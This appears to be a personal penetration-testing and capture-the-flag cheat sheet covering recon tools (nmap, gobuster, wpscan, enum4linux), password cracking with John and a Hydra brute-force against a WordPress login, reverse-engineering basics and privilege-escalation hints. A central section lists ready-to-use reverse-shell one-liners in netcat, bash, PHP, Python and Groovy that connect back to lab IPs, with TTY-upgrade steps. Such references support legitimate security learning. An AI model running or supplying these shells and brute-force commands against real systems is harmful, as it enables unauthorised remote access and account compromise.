- CheatSheet
-
write scripts for automating the repetitive tasks like:
- look for domain of the company
- look for subdomains of the domain
- look for dns entries
- use Google Hacking for deeper recon
- generate a detailed report of all findings
- ...
-
create a docker-based environment for pentesting/bug bounty hunting (find a way for running GUI based tools in docker)
For Pentesting/BugBounty-Hunting there is a very detailed map and guide of how to proceed.
Very useful BugBounty CheatSheet from EdOverflow
Bug Bounty Writeups for learning
python -m SimpleHTTPServer
python3 -m http.server
php -S 0.0.0.0:8000
ruby -run -e httpd . -p 8000
scans networks
nmap -sC -sV -oA nmap/openadmin 10.10.10.171
-sC
= scans with the standard scripts-sV
= scans the versions
bruteforce websites to find directories and/or files
gobuster dir -u http://10.10.10.10/ -w /path/to/wordlist
scans a target for wordpress related stuff
## basic scan
wpscan --url 10.10.10.10
## advanced scan with plugin detection
wpscan —url 10.10.10.10 —enumerate p,u —plugins-detection aggressive
creates wordlist from website
cewl -d 2 -m 5 -w genwords.txt https://10.10.10.10
enumerates Windows and Samba systems
Ports to look for: 445, 139
enum4linux -U -o 10.10.10.10
finding specific filetypes in domain
goofile -d kali.org -f pdf
searchsploit tomcat
John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered.
Command | Description |
---|---|
john –wordlist=/usr/share/wordlists/rockyou.txt hash | JTR password cracking |
john –format=descrypt –wordlist/usr/share/wordlists/rockyou.txt hash.txt | JTR forced descrypt cracking with wordlist |
john –format=descrypt hash –show | JTR forced descrypt brute force cracking |
hydra -L wordlist -p test 10.10.147.44 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid Username" -t 30
Tool to read and modify the metadata of files.
exiftool <file>
exiftool -artist=me <file>
radare2 is a tool for reverse-engineering
# start radare2
radare2 file
# analyze all
aa
# list all functions
afl
# set selection to main function
s main
# disassemble
pdf
# show graph
VV
wfuzz is a web fuzzing tool
wfuzz -H "Host: FUZZ.<domain>" -c -z file,"<path/to/wordlist>" <domain>
strings binaryFile
hexdump --canonical binaryFile
objdump -D -M x86-64 binaryFile
================ rax (64 bits)
======== eax (32 bits)
==== ax (16 bits)
== ah (8 bits)
== al (8 bits)
Register | Purpose | Saved across calls |
---|---|---|
RAX | temp register; return value | no |
RBX | callee-saved | yes |
RCX | used to pass 4th argument to functions | no |
RDX | used to pass 3rd argument to functions | no |
RSP | stack pointer | yes |
RBP | callee-saved; base pointer | yes |
RSI | used to pass 2nd argument to functions | no |
RDI | used to pass 1st argument to functions | no |
R8 | used to pass 5th argument to functions | no |
R9 | used to pass 6th argument to functions | no |
R10-11 | temporary | no |
R12-15 | callee-saved registers | yes |
MOV DESTINATION, SOURCE
- points to the next item on the stack
- grows downwards
- unchanged point in memory where the stack starts
memory: CPU:
0x0000 ________
| | <-------------- | SP |
| | |------- | BP |
| | | | IP |
| | <------| | .. |
| | | .. |
| | | .. |
0xFFFF |______|
nc -lnvp 4000
nc -e /bin/sh 10.10.15.22 4000
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.15.22/4000;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
php -r '$sock=fsockopen("10.10.15.22",4000);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
bash -i >& /dev/tcp/10.10.15.22/4000 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- can be executed with python or python3
python(3) -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg
python(3) -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo; fg
#!/bin/bash
echo $1 | tr -d "\n" | hexdump -v -e '16/1 "%02x " "\n"'
#!/bin/bash
echo $1 | xxd -r -p
Interesting Stack Exchange link
A Proxy is an instance between both communication partners. If you send a request to a server the proxy intercepts it and is forwarding this request to the server but is behaving like itself send the request so the server don't know about me. And the exact way back.
A Proxy Chain are multile Proxy Servers chained together so it is way more difficult to get to know the initial sender(client)
Here is a nice graphic on who sees what in Tor and HTTPS cases.
Use
- these magic numbers at the start of a file define the type of file
BMP : 42 4D
JPG : FF D8 FF E0
PNG : 89 50 4E 47
GIF : 47 49 46 38
- find programms which can be executed as sudo without password
sudo -l
- find files that belong to root but can be read by (anyone) because of groups